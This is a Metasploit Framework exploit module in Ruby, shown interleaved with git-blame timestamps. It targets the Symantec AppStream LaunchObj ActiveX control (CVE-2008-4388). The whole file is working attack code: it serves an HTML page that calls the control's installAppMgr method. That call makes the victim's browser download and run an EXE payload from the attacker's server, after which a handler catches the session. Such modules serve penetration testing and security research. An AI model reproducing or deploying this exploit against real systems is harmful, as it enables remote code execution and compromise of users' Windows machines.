2009-01-18 02:19:26 +00:00
|
|
|
##
|
2010-04-30 08:40:19 +00:00
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
2009-01-18 02:19:26 +00:00
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
2009-04-13 14:33:26 +00:00
|
|
|
# http://metasploit.com/framework/
|
2009-01-18 02:19:26 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2009-12-06 05:50:37 +00:00
|
|
|
Rank = ExcellentRanking
|
2009-01-18 02:19:26 +00:00
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
2010-09-20 04:38:13 +00:00
|
|
|
include Msf::Exploit::EXE
|
2009-01-18 02:19:26 +00:00
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
2010-11-24 19:35:38 +00:00
|
|
|
'Name' => 'Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute',
|
2009-01-18 02:19:26 +00:00
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a vulnerability in Symantec AppStream Client 5.x. The vulnerability
|
2010-04-30 08:40:19 +00:00
|
|
|
is in the LaunchObj ActiveX control (launcher.dll 5.1.0.82) containing the "installAppMgr()"
|
|
|
|
method. The insecure method can be exploited to download and execute arbitrary files in the
|
|
|
|
context of the currently logged-on user.
|
2009-01-18 02:19:26 +00:00
|
|
|
},
|
2009-11-14 18:09:05 +00:00
|
|
|
'License' => MSF_LICENSE,
|
2009-01-18 02:19:26 +00:00
|
|
|
'Author' => [ 'MC' ],
|
2009-03-15 18:12:33 +00:00
|
|
|
'Version' => '$Revision$',
|
2010-04-30 08:40:19 +00:00
|
|
|
'References' =>
|
2009-01-18 02:19:26 +00:00
|
|
|
[
|
|
|
|
[ 'CVE', '2008-4388' ],
|
2009-07-27 14:05:23 +00:00
|
|
|
[ 'OSVDB', '51410' ],
|
2009-01-18 02:19:26 +00:00
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
2009-09-09 21:23:11 +00:00
|
|
|
'Space' => 2048,
|
2009-01-18 02:19:26 +00:00
|
|
|
'StackAdjustment' => -3500,
|
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
2010-09-20 08:06:27 +00:00
|
|
|
[ 'Automatic', { } ],
|
2009-01-18 02:19:26 +00:00
|
|
|
],
|
2010-06-15 07:18:08 +00:00
|
|
|
'DisclosureDate' => 'Jan 15 2009',
|
2009-01-18 02:19:26 +00:00
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def autofilter
|
|
|
|
false
|
|
|
|
end
|
|
|
|
|
|
|
|
def check_dependencies
|
|
|
|
use_zlib
|
|
|
|
end
|
|
|
|
|
|
|
|
def on_request_uri(cli, request)
|
|
|
|
|
|
|
|
payload_url = "http://"
|
|
|
|
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
|
|
|
|
payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
|
|
|
|
|
|
|
|
if (request.uri.match(/payload/))
|
|
|
|
return if ((p = regenerate_payload(cli)) == nil)
|
2010-09-20 04:38:13 +00:00
|
|
|
data = generate_payload_exe({ :code => p.encoded })
|
2009-01-18 02:19:26 +00:00
|
|
|
print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
|
|
|
|
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
vname = rand_text_alpha(rand(100) + 1)
|
|
|
|
exe = rand_text_alpha(rand(5) + 1 )
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2009-01-18 02:19:26 +00:00
|
|
|
content = %Q|
|
|
|
|
<html>
|
|
|
|
<object id='#{vname}' classid='clsid:3356DB7C-58A7-11D4-AA5C-006097314BF8'></object>
|
|
|
|
<script language="javascript">
|
|
|
|
#{vname}.installAppMgr("#{payload_url}/#{exe}.exe");
|
|
|
|
</script>
|
|
|
|
</html>
|
|
|
|
|
|
|
|
|
|
|
|
|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
|
|
|
|
|
|
|
send_response_html(cli, content)
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2009-01-18 02:19:26 +00:00
|
|
|
handler(cli)
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2009-01-18 02:19:26 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
end
|